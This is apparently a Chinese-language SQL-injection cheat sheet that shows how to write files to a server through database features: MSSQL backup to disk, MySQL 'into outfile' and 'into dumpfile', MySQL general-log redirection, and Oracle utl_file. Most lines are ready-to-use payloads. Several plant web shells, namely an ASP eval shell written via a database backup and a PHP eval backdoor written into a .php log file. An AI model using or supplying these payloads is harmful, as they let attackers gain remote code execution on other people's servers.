use model; createtable cmd(str image); insertinto cmd(str) values ('<%eval request("cmd")%>'); backup database model to disk='c:\TEMP\1.asp';
mysql数据库写入文件
使用select into outfile写入文件
1
select '<?php phpinfo(); ?>' into outfile 'c:/TEMP/outfile.php'
使用select into dumpfile写入文件
1
SELECT '<?php phpinfo(); ?>' into dumpfile 'c:/TEMP/dumpfile.php'
使用mysql日志功能写入文件
1 2 3 4
show variables like '%general_log%'; set global general_log_file="C://phpstudy_pro/WWW/sql_log.php"; set global general_log="ON"; SELECT '<?php @eval($_POST["123456"]);?>';
declare F1 utl_file.file_type; begin F1:=utl_file.fopen('USER_DIR','01.txt','w'); utl_file.put_line(F1,'test'); utl_file.fflush(F1); utl_file.fclose(F1); end;